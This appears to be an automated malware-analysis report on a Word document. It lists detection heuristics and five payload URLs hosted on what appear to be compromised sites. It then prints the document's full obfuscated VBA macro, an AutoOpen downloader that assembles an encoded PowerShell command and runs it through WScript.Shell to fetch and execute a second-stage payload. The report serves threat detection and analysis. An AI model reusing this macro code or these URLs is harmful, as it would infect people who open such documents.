MALICIOUS (Risk Score: 290)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes WScript.Shell and CreateObject to execute commands, specifically referencing 'wershell ' which strongly suggests the execution of PowerShell. This indicates the document is designed to download and execute a secondary payload.
Heuristics (10)
- VBA macros detected (medium, 5 related findings), rule OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage (critical), rule OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:

      mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh
      jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790)
      BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX

- CreateObject call (high), rule OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:

      mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh
      jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790)
      BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX

- Payload URL decoded from an encoded PowerShell loader (5 URLs) (high), rule OLE_VBA_ENCODED_PS_DROPPER_URL: A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high), rule OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low), rule OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:

      Attribute VB_Name = "TVBWWOiAtYtk"
      Sub AutoOpen()
      On Error Resume Next

- Reference to Windows Script Host (high), rule SC_STR_WSCRIPT: Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium), rule OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium), rule EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info), rule EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.dinafiler.se/0mG1fU7ud/ (Referenced by macro)
  - http://www.atfaexpo.vn/Messages-2018/f7fc54gDI/ (Referenced by macro)
  - http://anantaawellness.com/TFLLjCZ/ (Referenced by macro)
  - http://www.salmix.com.br/6k7mXEEF/ (Referenced by macro)
  - http://www.geckochairs.com/H9gozcqlX/ (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15875 bytes |

SHA-256: 4960b5e9fe6d152eff47319806b4a898b96b9c4a939c967888f44f5beeeb0d93
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 300 of 554 identifiers look randomly generated (e.g. 'TVBWWOiAtYtk'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "CBzXuqZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TVBWWOiAtYtk"
Sub AutoOpen()
On Error Resume Next
CQPHD = ViIBcr - hKYMcE + (30894 / OzallV + 24204 - aijMLb * 66162 * cilUV)
PSoPjt = HLTAJn - pWRJI + (506 / WsiQGb + 4579 - tSvZbh * 15372 * WmTmSS)
qjEXpi = XIBtuB - HSbdA + (60214 / FWHno + 96017 - kLFYup * 20531 * iowwo)
LCnPh = RcLVD - ZJwdRt + (46603 / AEjMl + 63493 - uXpNQD * 53455 * NSMUd)
OnUWC = LvqiU - GkNwkA + (69882 / mzwUzL + 9910 - onhBrw * 81997 * nQmlfp)
WEwjZ = hDvOt - RqzXqG + (48305 / CASHH + 88657 - JUOwPz * 55119 * QDcffG)
TJOKE = OAzChB - XUbka + (10238 / jDMiz + 13908 - fjLpD * 16440 * wUZdM)
mnzOZr = tvfGiR - lobfc + (46916 / jQdnoQ + 67185 - ObuAS * 27851 * JsUmVa)
VzkBLjhiZiqM (HjvYNXEdDFb + YsEzMMioTz + wHcdwuj + zGukHbM)
FNcrS = IHoRj - PAmPw + (61541 / zXjRo + 24197 - ssaABG * 27815 * UTbUP)
wzqRbd = HahXtS - hVvnf + (76719 / QhoPc + 95317 - jTocQ * 57314 * YszNir)
hvBmoV = FqzOC - JJAjj + (284 / KVbMtf + 39259 - ipvJhd * 89205 * rIoTz)
RtcIoz = wXnpb - hSBCw + (61821 / bHsvc + 77895 - Idvaw * 93550 * znMGow)
End Sub
Function HjvYNXEdDFb()
On Error Resume Next
cllcL = nssca + GjXIJW - (53855 - ULpGAf + (63139 / 40436 + (aBpppp - ZtbbZJ)))
kQTFI = Jwzpv + Rwfbfi - (35740 - SblpR + (82724 / 89855 + (QuADKJ - phZYR)))
KVqCzN = hCBLEF - RztYu * ZUzBp * 24131 + zwnQcP - oOLJi * DscoB + twpdw + (VNZpWo - kmfkO / joibCl - qaAhrK)
mTiJTq = GCzwr + wzhXH - (26200 - SOKVm + (83016 / 25277 + (vNrzM - bRHWRY)))
rAjscQhX = "wershell " + " " + " " + " " + " . " + Chr(40) + " $PsH" + "OMe[4]" + Chr(43) + "$" + "pShOm" + "e[34]" + Chr(43) + "'x" + "'" + Chr(41) + Chr(40) + " " + Chr(40) + " " + "'14s72" + "%123A108" + ",23t6"
uWivjq = Dtvwc + sMCZlZ - (18753 - rHhMO + (37755 / 41153 + (NLJrd - nhtXh)))
iMKvH = qEwUz + vHDOB - (68170 - Xwvfk + (75181 / 70792 + (kYUjNr - uizlEu)))
bBzuu = jtSvs + wjJfi - (76329 - JaiEp + (83644 / 69471 + (rptGK - rqZlv)))
SOpzz = wNZvJ + mHIvt - (94366 - CKQoD + (46876 / 79720 + (FFsjuj - wukkF)))
XjOKwchom = "8%79A" + "93_7" + "f69A72%64" + ",79,73" + "_94z10X1" + "00u79A94," + "4t125" + "u79s72" + "%105t70A" + "67f79t68"
tmwAXw = iwHAR + rXrZR - (56953 - CVIAZ + (96554 / 10290 + (mwvzIC - iihss)))
MDMhfX = QaDSLp + XdvbY - (82152 - vBLAJ + (98277 / 57194 + (IrZlNp - wTtbQ)))
RLsLzv = EZjJF + WjhaI - (43275 - Ffcol + (35957 / 13752 + (ZRPiX - hkmYno)))
jzoWIh = LzXdi + XljEa - (62388 - JiHQfi + (30587 / 78186 + (uBUhzY - oSdkoB)))
dUCkb = "t94f1" + "7,14" + "u78,105_7" + "1%23,1" + "3A66s" + "94t94X" + "90z16" + "t5A5X93," + "93f93,4f" + "78A6" + "7_68X75_"
pKuTWr = AzziCV + MjHEs - (44164 - QqBiWw + (11599 / 88187 + (kjwjU - bHtpS)))
XjXUN = OFjCUR + ZTtlz - (90419 - GaOwG + (73536 / 79488 + (HzKCEM - JdOJJr)))
LtcoSc = BnGTBs + BAhWY - (20826 - SMtab + (70433 / 9930 + (chzZck - jLqWn)))
VlFjVY = vmXDF + tjiOr - (84934 - UKYWbQ + (62376 / 88070 + (VjBXi - aorGMo)))
HNlblEYhca = "76u67u7" + "0f79s8" + "8f4f89,7" + "9u5s26u71" + "z109u27" + "t76," + "127%29u95" + "z78u5" + ",106z" + "66,9" + "4X94u90," + "16%5"
GZCcj = rJfdTH + MznMkF - (32868 - TIORu + (32690 / 73291 + (nfSHd - jRObwv)))
jatRfN = TjAMu + mRoLp - (46631 - zswAz + (97073 / 29964 + (VwIJV - khUzOD)))
niLfav = iWtuzJ + SZOazQ - (96498 - rRNvfJ + (29900 / 43619 + (ldSmjm - LtDZcQ)))
GDvrE = jMbpC + uRfPkS - (212 - ITqLl + (75548 / 74519 + (EMYIa - GskSL)))
dzVOsIzVHw = "A5,93s9" + "3,93s" + "4f75" + "f94," + "76f75s79" + "_82A9" + "0z69"
isOqJM = rwfzRi + LhQdo - (92380 - CdNtqm + (35038 / 72569 + (dwCTLS - YQrcHh)))
ubWjJ = iqUjNc + AzTaO - (10139 - CzOPt + (85532 / 84978 + (MwTWUF - RUFIB)))
sGiGNV = RdClY + fqcsRh - (95583 - zirCYY + (5330 / 69304 + (MaUbF - TumdFz)))
vWliEt = chhGl + YmDozH - (64720 - qLDOa + (9529 / 17159 + (fEssEm - RuTJf)))
DXZjGacvcJz = "%4,92t68" + "%5z103," + "79f8" + "9u89_" + "75f77" + "X79,89s7_" + "24_26" + "z27f18" + ",5,76A2" + "9_76A73s"
HjvYNXEdDFb = rAjscQhX + XjOKwchom + dUCkb + HNlblEYhca + dzVOsIzVHw + DXZjGacvcJz
WQaKZ = CNuKFQ + uivzTQ - (65601 - VAczoP + (79615 / 30863 + (HvLus - SvWLu)))
DjBIZD = jqCzLL + QwNkX - (24442 - ZCJEwB + (44242 / 54770 + (zFnCR - bpPLu)))
ndTGj = obzRN + dVvMH - (75329 - smdYP + (82628 / 14774 + (ifzUF - nPVvJ)))
oDQPi = UqjXF + SsJdJ - (9940 - PbtGw + (96558 / 93969 + (wqGZQ - dcoWOt)))
End Function
Function YsEzMMioTz()
On Error Resume Next
CwjCwE = oDdKKw + pVCMCl - (41975 - aiZGi + (19749 / 40041 + (tJXfa - AijcY)))
nRlHwo = jttlAO + VAdsaR - (37218 - kBmRNW + (40765 / 38754 + (ZNuiIw - KqhlR)))
fEwAir = Uiloiz + drDdBY - (8313 - EsXJjw + (44550 / 45898 + (LSOuw - ENKcH)))
MQFEn = jllJWi + zGcZHw - (94888 - PcPjk + (59374 / 63369 + (PqvwSs - SEwFom)))
nCVzRBqrA = "31X30%" + "77u110X" + "99X5s10" + "6z66z94" + "t94t90" + "u16z5A5s" + "75z68,7" + "5f68z" + "94f75u" + "75A9"
IJjwS = DmpZVm + kLOdG - (82865 - NtfjS + (44387 / 9856 + (OzEdD - OQlAna)))
PsSoij = XHIlYC + PiCiv - (49842 - YrVsiF + (41839 / 88951 + (dSQZzB - rjnJq)))
XXQpz = FnCGIv + kUfaGN - (49677 - MmUFN + (7220 / 22788 + (jjhakd - AXZVP)))
XHljaM = fQaXrn + kwkjv - (86924 - SXaUz + (12306 / 10174 + (ChsKUo - iWmrPC)))
TlpqAqYbUPu = "3s79z70t" + "70,68" + "u79X8" + "9s89z4X" + "73u69A7" + "1t5f12"
kouApK = lmVjpj + iETlQ - (89817 - sskHGh + (61883 / 47581 + (IPnDB - CvUImR)))
OsDKoY = jiuCz + wJsicz - (24401 - NQBcw + (85536 / 4846 + (QIHPJ - sEwtHQ)))
oTFAs = miVsAl + AzwAdZ - (55758 - fSHdJN + (33538 / 20580 + (HQwRDB - hNWHuH)))
QnFBPv = KjNcIA + XjlVYb - (70484 - mawwJS + (30853 / 5855 + (kYsrp - MCPLw)))
FwbEDsKXn = "6u10" + "8_102" + "s102," + "64_10" + "5%112," + "5u106s6" + "6f94_94" + "f90%16X5"
XfPkLR = YFOfj + diSBO - (17474 - QFCzQi + (65065 / 50648 + (tmfZb - RkYUBW)))
DmzLi = iJYah + URcSU - (56203 - kILbAK + (61096 / 831 + (ictHN - BQzFA)))
iVlEJp = CmjpEP + bBhpj - (10489 - Nluki + (36511 / 33575 + (mipvji - PYpCKV)))
cSKtcQ = ODaLY + jrTaW - (51199 - AzzJf + (36462 / 63725 + (IAdvpj - baoqA)))
rwwhsDrP = "z5,93" + "_93,9" + "3,4t89" + "f75t7" + "0A71A6" + "7z82" + ",4z73" + "%69A71u" + "4A72z8"
cRGHRL = lKWRli + iuvQjo - (57937 - zHLFET + (11872 / 71512 + (BAlcY - VidiZm)))
kIQCvV = vnpHwU + vLGLfZ - (3278 - ksUKG + (50283 / 64820 + (GEsRX - pBYkn)))
vGULzI = LpSEr + lEsKz - (2255 - FRavj + (50998 / 7664 + (QMSPd - oCqQC)))
YpYPY = obzJF + DzWif - (48009 - XEqucz + (78769 / 26783 + (wCBuv - dQtLXd)))
dwdJuNYHzDj = "8u5t28" + "_65z29_7" + "1t114z" + "111f1" + "11u108" + "t5A10" + "6u66X94" + "t94%90" + ",16,5,5X" + "93z93_" + "93,4"
ZOFkz = VPUvm + GGTKR - (632 - DljfG + (53079 / 19044 + (sJiii - jmSvh)))
bFmwDX = WpDsjw + UfpjwJ - (79803 - dGlREJ + (45042 / 39316 + (OkQiw - lbjwnj)))
OLifD = ZWWWuN + UYYhkO - (45451 - hiCDD + (54629 / 86480 + (Enulc - YOpGS)))
KjjJf = CiQUnV + Mjdbb - (99931 - jARjA + (53223 / 3887 + (zJsdw - CwwtY)))
wwPlvwP = "_77_7" + "9u73%65" + "f69%7" + "3u66s75" + "A67s88_" + "89f4z73,6" + "9z71X5t9" + "8X19t77f6" + "9%80z" + "73X91" + ",70X11" + "4_5A13X4%"
BCCio = Ovjqk + dtidv - (80606 - jHRBb + (39588 / 70468 + (LKLJi - dKknw)))
EflQt = jjCSjk + vEHkBa - (19585 - HCkVh + (3897 / 52839 + (jzpzi - BWAHBk)))
QBfwiE = jwXucc + MlSVzV - (5154 - wiBWjE + (14735 / 29031 + (CPopj - FbTYSS)))
VFVTY = QbnOln + zzMXr - (52647 - LsMnqc + (99747 / 25595 + (jzkLkM - AMjRwl)))
cfnXqifrMzw = "121z" + "90u70A67" + "u94,2" + "u13A" + "106,13" + "u3%17%" + "14A80z112" + "f98X1"
fPdwww = blbGPX + uTXpvT - (23335 - dFhSb + (28313 / 44755 + (QMKvl - MqqSU)))
hQuzm = Jpjbh + jamXQ - (57804 - VEVLt + (8887 / 52575 + (aHhzc - wXNLkf)))
ztbbh = UVZjMn + zcAuM - (46992 - iSVtm + (94643 / 93441 + (ljtZZ - IJIuz)))
GiJNc = XBYVG + ccSjXh - (77916 - rRkppn + (28165 / 8781 + (TrAMKB - JHQcZ)))
QKOSaZLAB = "0%23,10_1" + "3,18t" + "29z25,13" + "t17z14X11" + "0,94f88," + "23X1"
YsEzMMioTz = nCVzRBqrA + TlpqAqYbUPu + FwbEDsKXn + rwwhsDrP + dwdJuNYHzDj + wwPlvwP + cfnXqifrMzw + QKOSaZLAB
QAoiwt = MIoEm + iqNYmO - (5614 - YawXtf + (69276 / 65198 + (BmjQt - EjwqPK)))
woKiIZ = QmusCr + qHDOn - (57884 - mRFTpO + (17203 / 78122 + (YniwdK - OWKzH)))
Fhjpi = MLioZ + zzJLF - (336 - LHjiCc + (7996 / 15713 + (DYLjwE - WpVPA)))
ssSHm = wpLILr + IWzdN - (51374 - cIJctO + (86346 / 68975 + (WjlswP - PvpYJv)))
End Function
Function wHcdwuj()
On Error Resume Next
locDzD = jRiEL + sMMwwj - (83001 - zXAvO + (38108 / 92876 + (OXirwS - XwMjsH)))
BuTnGM = iovASm + bHkjH - (78835 - GZTja + (32783 / 79267 + (jzwMMV - caNjL)))
roNBC = ctbbj + KWEKTL - (48340 - wWEYtv + (60525 / 89060 + (rcidWZ - GnLuL)))
wLwITo = DDzai + VkoIG - (67398 - EkzCLn + (93935 / 77180 + (jziQz - sakbr)))
OaBQVXpiz = "4f79X" + "68f92s16" + "_94t" + "79X71f90" + "X1f13A118" + "u13f1f14" + "s80s1" + "12s98u" + "1u13%4u"
ppkJN = FnhoFV + oUAELC - (12195 - RviXf + (65412 / 69850 + (IIMnK - nbfDfZ)))
VzDbiI = oImSfv + uGmiJ - (40314 - YfsilL + (63541 / 46426 + (HWhWw - avAZDL)))
jjrdjd = qczlSj + UzGjvr - (62085 - wCGZw + (42994 / 59538 + (WYdSW - cDunuG)))
zMtca = dUhnUE + lpWGhY - (22844 - dMoRX + (58491 / 44251 + (lIwZz - pNzVl)))
jVljzozn = "79u82,79" + "A13s17,76" + "A69,88f7" + "9%75A73" + "u66t2z1" + "4X126s" + "91u80" + "u10f6"
hHQAQ = bsMcwO + FbVEik - (75823 - jMwDop + (6485 / 59075 + (OMfanR - LDoOTB)))
ujfuzv = FpSTB + RzbsYN - (73111 - liPSK + (55965 / 85376 + (vYZilE - JvDjP)))
WtHOF = VtVWEw + SKttwz - (32398 - ivwZbw + (60544 / 81601 + (jRbYIw - WGoCfl)))
dZzfQ = HdEuQ + wJoiwq - (5884 - mnUYJM + (37475 / 43532 + (LODsvV - bRPoaG)))
ajCCvSN = "7u68" + "s10u" + "14z78%105" + "t71,3X" + "81,94f" + "88f83" + "X81f" + "14z7" + "2t12"
iGNaX = DuRaoq + zMsWQB - (93967 - XMAHKi + (13937 / 77567 + (cwlmV - OSkIY)))
dabwd = whlUPF + GtMTMD - (92188 - KwsEG + (59086 / 95996 + (DftYat - YJjnIH)))
XMHlW = ObwqFP + IzPcp - (35231 - atutW + (17524 / 25569 + (RzUiWF - VIjnC)))
DziUPY = YuSOQw + dSNONN - (76042 - zVbsI + (88404 / 53685 + (vBQoX - LZHkRB)))
CBjNBFBVSDA = "3A108A4t1" + "10_6" + "9z93A" + "68f70_69," + "75t78z10" + "8X67s7" + "0s79u2X14" + "t126_91" + "s80_6f1" + "0%14"
tVrfvB = AYMPP + POwFN - (96203 - QvqYk + (52002 / 21643 + (cNCPOQ - WwKLbM)))
vGkIQ = Tjfcn + iwfTuU - (81234 - YLJzBw + (37724 / 85617 + (vCWLsz - ncKzQs)))
HjjCO = CzYFc + ScjtX - (30849 - DhpWj + (19214 / 25097 + (nJfPn - pqLYEQ)))
bEHovU = JoPJXI + oRKzs - (2454 - Opspp + (13343 / 56009 + (YUSzXc - iilplw)))
IKLlYdrFkEa = ",110X94,8" + "8z3z17f" + "121A94" + "u75X88,9" + "4,7t122f" + "88%69A7"
WfiOoX = EWids + ZGZqbk - (62632 - usldw + (88382 / 23882 + (VzNEOz - fwFizU)))
WlojYi = nVjITc + wkpdMQ - (3154 - Qoccit + (84670 / 42988 + (ivCWA - PViGii)))
abnhwr = PqlWzk + kGUtaj - (70363 - ROqzuj + (35808 / 18996 + (ZfciYN - WBVfL)))
osOnCV = DpIzAK + rzwwz - (63700 - zTHOMt + (10943 / 44551 + (OEOja - kHdzTo)))
tQkjMci = "3u79t" + "89_89u" + "10u1" + "4f110z9" + "4X88s17z" + "72%88t" + "79,75z65u" + "17u87%7" + "3X75A94A7" + "3t66A81"
sjZoWJ = QXMPA + vqzzhj - (72187 - mWlOu + (81497 / 67329 + (VLaPIB - JtlQcu)))
Edijl = jTYhv + GJoabT - (55510 - BApljt + (227 / 81544 + (vSIcf - IfLFM)))
vvUpiN = EkEpn + AGvAp - (90357 - jZXZQw + (91189 / 49007 + (iJTEm - hHoKiG)))
wqMifp = aiQni + WXvYmS - (81889 - FuWiiH + (49607 / 77961 + (iQsjb - MiQGQh)))
wjvRJaV = "f87u87' -" + "split 'Z'" + " -spLit" + "'U'-spLIt" + "'F' -SP" + "LiT'" + "t' -SPL" + "it','-sP"
wHcdwuj = OaBQVXpiz + jVljzozn + ajCCvSN + CBjNBFBVSDA + IKLlYdrFkEa + tQkjMci + wjvRJaV
DAYGL = SlPfd + LqmZIU - (46125 - CMVoqI + (35228 / 72464 + (vRMiM - iLtunY)))
kMYrTB = EhjEj + rfkPD - (71310 - iTNQBz + (98028 / 7872 + (OakGH - IPzpRf)))
CnsTi = jUTKzz + EDnzz - (83383 - sPdOn + (95885 / 53302 + (fuPOPU - NwRAwT)))
klVJI = OUiLNr + nJijl - (37098 - pYvjjz + (11037 / 81769 + (jzsCXf - sipBcK)))
End Function
Function zGukHbM()
On Error Resume Next
GsFWi = zUjwO + hXGAY - (37625 - nJXzL + (55420 / 6492 + (IDLqf - tGkcT)))
AYiGXo = WKPkmo + aDjtt - (88755 - wpQUHi + (98665 / 76000 + (WYFWz - iRbWu)))
OlIwBA = adqCr + QzHpT - (4419 - qSGTa + (5810 / 30051 + (UQOUB - FcIDzw)))
nkjiO = LJIJVO + GvioXw - (69971 - GNciqb + (21025 / 43064 + (mWDBDh - lLIEN)))
fnUmjcB = "lit'_' -s" + "PLIT" + "'S'-s" + "PlIt'X'" + " -Sp" + "LIT'%'-"
ImFGnv = zqDVkW + mHdHYj - (89484 - oBRiN + (15262 / 74449 + (rSNCIU - Fmhbn)))
noPGF = Fttta + HzDpEi - (53110 - GMCWU + (44653 / 35147 + (YUrHHb - NCcHs)))
DsTYCb = qXqiYW + iNlPG - (66703 - usMhSE + (22150 / 48185 + (RXzts - zvFGFz)))
jpjAvf = fLQMw + zHrkW - (66202 - GYLZc + (22057 / 71750 + (qKzdl - MWARJ)))
HRoIppphZwK = "SpLit 'a'" + "|FOR" + "EaCh{ [CH" + "aR]" + Chr(40) + " " + "$_ -BX" + "Or'0x2A'" + " " + Chr(41) + "}" + Chr(41) + "-jOi" + "N'' " + Chr(41)
OclAm = uoFPO + UBijTp - (63098 - OTCGN + (89571 / 49431 + (nNJoA - JBUYi)))
IYCsUM = phFqVS + Gvaim - (85270 - kArGaz + (26165 / 83493 + (LvLvwp - JmANj)))
qwZnRB = OQiwA + Salsmi - (93987 - UYBSd + (60489 / 91348 + (mbaidP - djCVv)))
ImsHf = abKqZ + QVZXUn - (42458 - YdGYRw + (4897 / 24519 + (IjMBr - lJLwV)))
MbJJIULZh = ""
zGukHbM = fnUmjcB + HRoIppphZwK + MbJJIULZh
uBwkS = drnDtd + sZKRDN - (26097 - BAonP + (44196 / 34417 + (tbfmKP - AWccbz)))
nEdcHz = TVckKs + KwCOL - (215 - bOqidi + (19132 / 90312 + (kmOUMj - nPUPa)))
iXoWlA = aplmz + XLmuN - (37371 - DtvJWQ + (31437 / 59010 + (smiDJ - TRDON)))
CWJZzb = FWrnu + XociAU - (69294 - KwzHuO + (9552 / 83104 + (rwGVA - lkYpz)))
End Function
Attribute VB_Name = "mwLtdfp"
Function VzkBLjhiZiqM(zMHaqSPQ)
On Error Resume Next
blojS = PfoUAl + YGOjYC * 3562 * 93746 + 38522 - ZjNkb - 48689 / dcKStm - jXQCTK / UwwsP / MzjBW - ZOzEL / FMrYaP + TizBmz * JGEnRs / NPdsI
AtMzHV = PlCPwE + AKidK * 92100 * 71219 + 66347 - KAIwm - 2601 / PuYkB - wMiLV / AVtii / OPTvT - vRsBzw / BOOmU + UTpMR * zaVifR / ZvYmD
OlQGCP = WHbsu + XVrkn * 45058 * 96027 + 41720 - NwiHtT - 90930 / nUnwVR - ZBqoqG / nDUWFV / OrFPUX - buVAb / oYGQB + KKljJ * mXJbmX / ZzZdi
aoPkLT = tJAibB + FUpOz * 17708 * 46506 + 84340 - jHjdAz - 2403 / tsKUVS - isDOiS / blvGY / QrdHiH - ccqnuI / pjqij + wjEGJ * OSjzi / aMZBOD
Fiwhn = ftwFs + MNvkc * 57369 * 575 + 36323 - MCjrG - 90918 / ajqOT - jFPbjh / iWkIKX / iaGth - RscOq / PZTOPi + OjpUAu * USqSb / jbbzdw
CcVAJ = ummWuJ + HzKAi * 80493 * 12741 + 70730 - rCKjE - 18278 / Yamum - jAdnL / QTpabz / wlArwc - slSpcj / SNwIPl + NJWrdb * qBbjh / LiXip
LRFMKt = vwsKs + OYLaaG * 33752 * 62422 + 77856 - AUFci - 97449 / PFSjs - OcADLT / mchJj / bmjoQD - uErFQ / wYdEZ + VdzzZ * GMUkX / vwAWmj
mNQjSE = OwOwV + NwcMzw * 4965 * 88499 + 96577 - KMmSc - 84393 / NfRTtG - QjhkO / sIRlf / lCjvG - nuGXf / mWAAQD + TpLwO * RfnZB / BnMGuh
jklGNtSjo = hdoWV + CreateObject("Wscript.shell").Run(rVzsvizbA + Chr(vbKeyP) + VLXPwCtKFV + Chr(vbKeyO) + zMHaqSPQ + LZdAuKDOEw, 769671790 - 769671790)
BwYfji = iIMmA + WjzhLn * 24899 * 99705 + 52994 - wHiItZ - 1673 / FqBbb - aRIFq / jUSMP / EwNHSo - WZXAVc / HMhJj + EwGtfH * XvioV / wUCmzX
wpCzQ = jEEzMV + zSvDLO * 22807 * 38001 + 55545 - jtpUl - 66599 / SmVUJp - iFNYr / pmmXY / GYnMao - oWFai / VcjZAW + caYFAm * VMtHSv / bDfZvf
HvEon = VGLwP + BtLGj * 80118 * 7813 + 80028 - SFYmii - 32430 / IfCDY - jiCUrk / HQZdUG / ThjaRP - qfCEsE / CRNHdH + YiVMFw * ozIOX / Cbwbm
wjncBk = SYPHU + LInoGG * 98828 * 28514 + 3173 - BKmJzn - 95204 / kTzBi - NTPsAw / izzVb / ntXzSv - lSOaEi / vWBhKZ + bmqHOF * TMpoWA / aNWfG
End Function